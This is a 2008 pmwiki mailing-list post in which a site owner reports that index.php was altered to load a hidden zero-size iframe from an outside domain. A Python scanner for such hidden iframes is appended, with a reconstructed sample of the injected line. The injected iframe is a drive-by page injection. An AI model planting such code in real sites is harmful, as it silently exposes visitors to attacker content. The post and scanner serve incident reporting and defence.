[pmwiki-users] Possible security issue
Marcus
films at wordit.com
Wed Mar 5 06:32:18 CST 2008
I have a possible security issue, not sure whether it is pmwiki or on my
server.

I've been running pmwiki for about a week online. Yesterday the
index.php page gave a syntax error about a missing closing tag. I
wondered why the page had changed when I hadn't edited it.

It turns out somebody was able to use a security exploit to write to the
index.php file. They added the following iframe:

<?php include('pmwiki.php');
<iframe src="http://pinoc.com/count.php?o=2" width=0 height=0
style="hidden" frameborder=0 marginheight=0 marginwidth=0
scrolling=no></iframe>

I've no idea what that domain pinoc.com is and what the intention is.
Normally I think they are spammers trying to add links. If so, where do
I report them?

The file was only writable by owner. Now I changed all permissions to
read-only. That solves it, but I'd still like to know how it could be
possible?

I'm running pmwiki-2.2.0-beta65. Any ideas whether this is a pmwiki
issue or my setup, or my general server security?

Before I forget, a big Thank You to Patrick and the other developers for
pmwiki. I'm running Puppy Linux, which follows a similar philosophy as
pmwiki, trying to avoid bloat yet remain powerful. pmwiki being under
2MB unpacked is brilliant. It just works out of the box. I can rsync
with local and online wikis because pmwiki uses flat files. With
lighty and PHP it's all only 15MB. You really did make it simple and
extensible. Great job.

Many Thanks,
Marcus
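
The following is an added example, not part of the original message or of PmWiki: a Python scanner that walks a web root and flags zero-size or CSS-hidden iframes like the one quoted above, returning each affected file's permission bits and modification time for triage. The sample input is constructed on the model of the quoted snippet with a placeholder host, and the function names are this example's own.

```python
import os
import re
import sys

# Constructed sample modelled on the snippet in the post (placeholder host).
SAMPLE_INDEX = (
    "<?php include('pmwiki.php');\n"
    '<iframe src="http://injected.example/count.php?o=2" width=0 height=0\n'
    'style="hidden" frameborder=0 marginheight=0 marginwidth=0\n'
    "scrolling=no></iframe>\n"
)

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")
HIDDEN_CSS_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def is_tiny(value):  # True for a 0 or 1 pixel dimension such as 0, "1" or 0px
    m = re.fullmatch(r"(\d+)\s*(px)?", (value or "").strip(), re.I)
    return bool(m) and int(m.group(1)) <= 1

def find_hidden_iframes(text):
    """Return (line, src, reasons) for each iframe a visitor would never see."""
    hits = []
    for tag in IFRAME_RE.finditer(text):  # [^>]* also spans line breaks
        attrs = {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(tag.group(0))}
        reasons = [f"{k}={attrs[k]}" for k in ("width", "height") if is_tiny(attrs.get(k))]
        if HIDDEN_CSS_RE.search(attrs.get("style", "")):
            reasons.append("hidden style")
        if reasons:
            line = text.count("\n", 0, tag.start()) + 1
            hits.append((line, attrs.get("src", ""), reasons))
    return hits

def scan_tree(root, exts=(".php", ".html", ".htm")):
    """Walk root; return (path, mode, mtime, hits) for every file with a hit."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read())
                if hits:
                    st = os.stat(path)
                    findings.append((path, oct(st.st_mode & 0o777), st.st_mtime, hits))
    return findings

if __name__ == "__main__":
    print(*scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."), sep="\n")
```

The modification time of a flagged file gives a starting point for searching the web server's access log around the moment of the change.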